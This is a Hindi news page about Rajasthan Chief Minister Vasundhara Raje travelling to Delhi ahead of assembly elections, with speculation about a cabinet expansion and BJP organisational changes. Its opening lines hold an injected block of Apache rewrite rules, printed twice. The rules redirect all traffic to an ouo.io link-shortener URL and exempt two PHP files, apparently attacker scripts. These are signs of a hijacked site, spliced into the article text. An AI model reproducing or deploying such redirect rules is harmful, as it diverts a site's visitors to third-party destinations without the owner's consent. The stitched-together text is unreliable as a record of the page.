
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 768
Previous Nextजयपुर। मुख्यमंत्री वसुंधरा राजे पूरी तरह चुनाव के मूड में आ गई है। राजे विधानसभा चुनाव जीतने के लिए वो सभी दांव खेल रही है जो उनकी सरकार में वापसी करा सके। मुख्यमंत्री राजे के दिल्ली पहुंचते ही अब मंत्रीमंडल के विस्तार की चर्चा ने जोर पकड़ लिया है। दिल्ली में राजे का राष्ट्रीय अध्यक्ष अमित शाह से लेकर कई मंत्रियों से मिलने का कार्यक्रम है। इसके साथ ही संगठन में भी बदलाव के संकेत दिए गए हैं।
उपचुनाव में भाजपा के प्रदर्शन में लगातार गिरावट के चलते प्रदेश में संगठन और सरकार में फेरबदल की सुगबुगाहट कई दिनों से चल रही थी। कैबिनेट की बैठक से ठीक पहले मुख्यमंत्री का दिल्ली पहुंचने से कई अटकलों को जन्म दे गया। हिन्दी प्रदेशों राजस्थान, मप्र, और अब उप्र में भाजपा के गिरते प्रदर्शन से राष्ट्रीय नेतृत्व खासा चिंतित है। विधानसभा चुनाव में अधिक समय नहीं है। यह बात भाजपा नेताओं को पता है। यही वजह है कि डेमेज कन्ट्रोल में तेजी लाई जा रही है। इसके तहत तबादले खोले गए तो राजनीतिक नियुक्तियों का दौर भी शुरू हो चुका है। संगठन पदाधिकारियों को जनता के बीच जाने के निर्देश भाजपा के राष्ट्रीय सह संगठन महामंत्री वी. सतीश तीन दिवसीय प्रवास पर बुधवार को जयपुर आ गए हैं। वे तीन दिन तक राजधानी में रहेंगे। पहले ही दिन उन्होंने मीडिया टीम सहित सातों मोर्चों के अध्यक्ष-महामंत्रियों की बैठक बुलाई। इसमें कहा कि जनता के बीच जाकर काम करो।